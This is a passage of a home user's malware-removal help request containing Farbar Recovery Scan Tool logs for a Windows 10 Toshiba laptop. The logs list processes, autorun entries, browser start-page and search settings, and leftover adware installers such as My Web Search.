2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-09-04 17:44 - 2011-09-04 17:44 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2011-09-28 21:30 - 2011-09-28 21:30 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-09-10 09:35 - 2011-09-10 09:35 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2011-11-30 23:09 - 2011-11-30 23:09 - 0091712 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Lexi\FileThisDesktopInstaller.exe


Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\Foxit Updater.exe
C:\Users\Lexi\AppData\Local\Temp\Runner.exe
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-07 13:33

==================== End of FRST.txt ============================


Here is my second run:

FRST

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 22:56:04)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-08]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
URLSearchHook: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 - (No Name) - {8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} - No File
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL =
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
